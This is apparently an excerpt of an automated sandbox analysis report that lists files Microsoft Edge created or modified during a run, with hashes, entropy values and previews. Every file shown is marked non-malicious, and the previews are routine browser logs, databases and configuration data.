File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.2272629455500015
Encrypted:	false
SSDEEP:	6:HAXQWUq2P923oH+TcwtnG2tMsIFUt8YAXQW1Zmw+YAXQWnkwO923oH+TcwtnG2tF:gAXv4Yebn9GFUt87A6/+7AG5LYebn95J
MD5:	23440DE48B6CE0AF84237952BB4C2BBA
SHA1:	00F79BD8ADDEB6188EEB0BE2B6BDE3E5D6FB4D71
SHA-256:	2C055828DF6D8278175BB5ADC75FBDF7074FB936FAB149E09BF8B77C598B644A
SHA-512:	3CADBBA28CE905A767DC6DCEF7B223D1EF027A5B5326E92B2F3205177A7010A48B9A661541151A41583C0243A6D78B8EC16E41BAF87FF994509635A9CDA48FA7
Malicious:	false
Preview:	2024/11/25-05:33:53.899 1e60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/25-05:33:53.899 1e60 Recovering log #3.2024/11/25-05:33:53.899 1e60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.2272629455500015
Encrypted:	false
SSDEEP:	6:HAXQWUq2P923oH+TcwtnG2tMsIFUt8YAXQW1Zmw+YAXQWnkwO923oH+TcwtnG2tF:gAXv4Yebn9GFUt87A6/+7AG5LYebn95J
MD5:	23440DE48B6CE0AF84237952BB4C2BBA
SHA1:	00F79BD8ADDEB6188EEB0BE2B6BDE3E5D6FB4D71
SHA-256:	2C055828DF6D8278175BB5ADC75FBDF7074FB936FAB149E09BF8B77C598B644A
SHA-512:	3CADBBA28CE905A767DC6DCEF7B223D1EF027A5B5326E92B2F3205177A7010A48B9A661541151A41583C0243A6D78B8EC16E41BAF87FF994509635A9CDA48FA7
Malicious:	false
Preview:	2024/11/25-05:33:53.899 1e60 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/25-05:33:53.899 1e60 Recovering log #3.2024/11/25-05:33:53.899 1e60 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.613541137083734
Encrypted:	false
SSDEEP:	24:TLapR+DDNzWjJ0npnyXKUO8+julzpcBmL:TO8D4jJ/6Up+ileG
MD5:	C3679FFCB09AF98C2141B04D9A68E7C9
SHA1:	46BDFB34C481457817761F7D7869BA7ACF5920AA
SHA-256:	B986DA8361EE7DD7662EAF868DDE7D415A7A1EC6955C8010E0E162CD1D42E9CC
SHA-512:	7FD6BFF96B5C0D126B915C8396C1C25D7B3E7A1B0E61E5FBE44F453E0061E6916408B5E8BB2199B4F7738D958A58EE4B38CE7837C85AEA36CE5030C313D75F7F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354144283183435
Encrypted:	false
SSDEEP:	6144:tA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:tFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	D87E78B83EBA6C02A0F021824C7564FC
SHA1:	12EED019274B73D4892EC1E1AA3D09BE9CD56910
SHA-256:	0D1707777680AE1CC3F6537730041691765A0FF94897FF095D349FCE0336704E
SHA-512:	F641FE006B83659251D202A0BF98C21D7465A2A36B35AE50980199D57124157CED8968356791B38E208EDA47281C74DB394C517074669C2603F2B3707AE79A0D
Malicious:	false
Preview:	...m.................DB_VERSION.1.!..q...............&QUERY_TIMESTAMP:domains_config_gz2...13377004441875092..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.209016022111084
Encrypted:	false
SSDEEP:	6:HAXQcuRHM1923oH+Tcwtk2WwnvB2KLlVAXQcTq2P923oH+Tcwtk2WwnvIFUv:gAcIhYebkxwnvFLoAcTv4YebkxwnQFUv
MD5:	02329335EF15D1BAA7250395D3D35927
SHA1:	962FF4C0BF11988CAB6E8BA97BFDF0223B9290DE
SHA-256:	146FCF912D57EE5A0E87CFADA6484296BDE11319FD2E37B045B3841C252AA3E3
SHA-512:	416B84E82A21DC42DC7240804873EB867204FFF59DDBCB0D3E94A8AF6E850395C6BF904B4AD7BECA624810D37CF2AFE610E0672A9F30A9FD6907A9ADE197076F
Malicious:	false
Preview:	2024/11/25-05:33:59.128 694 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/25-05:33:59.169 694 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324610868879421
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rh:C1gAg1zfvJ
MD5:	80993A6AD6A9873660DE93BA30B71D9C
SHA1:	63DC16D2B4712EBA5E1B7637EFF3FBBB98FC9A34
SHA-256:	B4FB8F418EF23F1F0CB82DF924658A55671DAC0EBA9694CD9D6DE7552495A36C
SHA-512:	D54CA2698B7592D57232A38C1074D9C55821A391E06079D50D22C893E2D30A856B1A253F59595203DC2CC2EFB9ECCE32B8C1D85C3B9B05DFF6D9A665BB97C289
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1633522482991605
Encrypted:	false
SSDEEP:	6:HAXQWIjIq2P923oH+Tcwt8aPrqIFUt8YAXQWNeFZZmw+YAXQWjkwO923oH+Tcwtc:gAVjIv4YebL3FUt87AiO/+7Aa5LYebQJ
MD5:	62000997EDE3CFC5A4D3AED1AD3E3B50
SHA1:	BA2D8DE5A1CFF4C7F047E82B94141C510C831EA3
SHA-256:	938C7382A9F55E7853A9724B83A17BE4065CBC7A656F53A100B37E6A5F1E0327
SHA-512:	DBEDE9A8CAC202B1849CA7621B3315676A95BCE9277862D0A864983AF5CA99958AE4943C4DAA595E1ED888A875C705CD8F899B0F2BA1C3177A486CF29FFECD4C
Malicious:	false
Preview:	2024/11/25-05:33:53.950 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/25-05:33:53.965 1e54 Recovering log #3.2024/11/25-05:33:53.966 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1633522482991605
Encrypted:	false
SSDEEP:	6:HAXQWIjIq2P923oH+Tcwt8aPrqIFUt8YAXQWNeFZZmw+YAXQWjkwO923oH+Tcwtc:gAVjIv4YebL3FUt87AiO/+7Aa5LYebQJ
MD5:	62000997EDE3CFC5A4D3AED1AD3E3B50
SHA1:	BA2D8DE5A1CFF4C7F047E82B94141C510C831EA3
SHA-256:	938C7382A9F55E7853A9724B83A17BE4065CBC7A656F53A100B37E6A5F1E0327
SHA-512:	DBEDE9A8CAC202B1849CA7621B3315676A95BCE9277862D0A864983AF5CA99958AE4943C4DAA595E1ED888A875C705CD8F899B0F2BA1C3177A486CF29FFECD4C
Malicious:	false
Preview:	2024/11/25-05:33:53.950 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/25-05:33:53.965 1e54 Recovering log #3.2024/11/25-05:33:53.966 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.133369100287501
Encrypted:	false
SSDEEP:	6:HAXQty1q2P923oH+Tcwt865IFUt8YAXQtGZmw+YAXQt6kwO923oH+Tcwt86+ULJ:gAt4v4Yeb/WFUt87AtG/+7At65LYeb/L
MD5:	820D7E5237B3AF94F00315C5A644CB0D
SHA1:	0924E75B49199B573BDBC9C47619BECF9D8546C3
SHA-256:	DFE521EA882A1B33E469C117D3D47EA499033BC8F7C7FD930E8638C5D832C93B
SHA-512:	F5E0A37E7F494EAEA639809ADE955DDF6C2785A0187D07F324196AE531C205B7207B8BBFFC2338D5C4DCA320E501E3AA37B8D6B1999AC4505A3FB99A0D507F8A
Malicious:	false
Preview:	2024/11/25-05:33:54.001 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/25-05:33:54.008 1e54 Recovering log #3.2024/11/25-05:33:54.008 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.133369100287501
Encrypted:	false
SSDEEP:	6:HAXQty1q2P923oH+Tcwt865IFUt8YAXQtGZmw+YAXQt6kwO923oH+Tcwt86+ULJ:gAt4v4Yeb/WFUt87AtG/+7At65LYeb/L
MD5:	820D7E5237B3AF94F00315C5A644CB0D
SHA1:	0924E75B49199B573BDBC9C47619BECF9D8546C3
SHA-256:	DFE521EA882A1B33E469C117D3D47EA499033BC8F7C7FD930E8638C5D832C93B
SHA-512:	F5E0A37E7F494EAEA639809ADE955DDF6C2785A0187D07F324196AE531C205B7207B8BBFFC2338D5C4DCA320E501E3AA37B8D6B1999AC4505A3FB99A0D507F8A
Malicious:	false
Preview:	2024/11/25-05:33:54.001 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/25-05:33:54.008 1e54 Recovering log #3.2024/11/25-05:33:54.008 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.146624306318169
Encrypted:	false
SSDEEP:	6:HAXQtNN+q2P923oH+Tcwt8NIFUt8YAXQtNZZmw+YAXQtiVkwO923oH+Tcwt8+eLJ:gAtmv4YebpFUt87Atf/+7Ata5LYebqJ
MD5:	2699C177590DD7707E186A9421BD4042
SHA1:	5B9C02A515AA17EE652179963DA978FAB8070BAF
SHA-256:	A3A3AA9A5C6FE9BAEFBDBE85A3DBEB341EAD0D023625937BD35EA4E8BF7C7CE0
SHA-512:	E38B4249808B8A955E29C010B5C8DFF17267FFC05047EC98E533109E934192B87B84A187CBD5C1C32F2A9AC63B4A46C5D7D4C54E1A7581A575C080DD2E7B7C6E
Malicious:	false
Preview:	2024/11/25-05:33:54.843 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/25-05:33:54.843 1e18 Recovering log #3.2024/11/25-05:33:54.844 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.146624306318169
Encrypted:	false
SSDEEP:	6:HAXQtNN+q2P923oH+Tcwt8NIFUt8YAXQtNZZmw+YAXQtiVkwO923oH+Tcwt8+eLJ:gAtmv4YebpFUt87Atf/+7Ata5LYebqJ
MD5:	2699C177590DD7707E186A9421BD4042
SHA1:	5B9C02A515AA17EE652179963DA978FAB8070BAF
SHA-256:	A3A3AA9A5C6FE9BAEFBDBE85A3DBEB341EAD0D023625937BD35EA4E8BF7C7CE0
SHA-512:	E38B4249808B8A955E29C010B5C8DFF17267FFC05047EC98E533109E934192B87B84A187CBD5C1C32F2A9AC63B4A46C5D7D4C54E1A7581A575C080DD2E7B7C6E
Malicious:	false
Preview:	2024/11/25-05:33:54.843 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/25-05:33:54.843 1e18 Recovering log #3.2024/11/25-05:33:54.844 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	8720
Entropy (8bit):	0.21848828281205318
Encrypted:	false
SSDEEP:	3:sblntFlljq7A/mhWJFuQ3yy7IOWU8lwl/dweytllrE9SFcTp4AGbNCV9RUIQW:sbG75fOylQ/d0Xi99pEYd
MD5:	85E52AD90318B14238F431C5238AD9AB
SHA1:	484A80BB7841EDBCA3CB536E09E402EDDBD75A57
SHA-256:	693A10EEF1A95FC6AB635B7B48A0341223F2B6449EED4A7ACF02A4ABF0A6B422
SHA-512:	441F7FB4E577229FB2E10BDB4DD8D01934F7E406FED5EEAEBDE098638419C3849F98D0E3DAB0E9327E2F3DD33EC5F763F7AC10D856D1E99DF4402A465691EDB2
Malicious:	false
Preview:	...................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6481262007522295
Encrypted:	false
SSDEEP:	384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
MD5:	DF0D2FCFE368ECEEB78C13B004DAEDBD
SHA1:	1E9121546F3F0758130C2A37F274C56BCE00B702
SHA-256:	91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
SHA-512:	13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

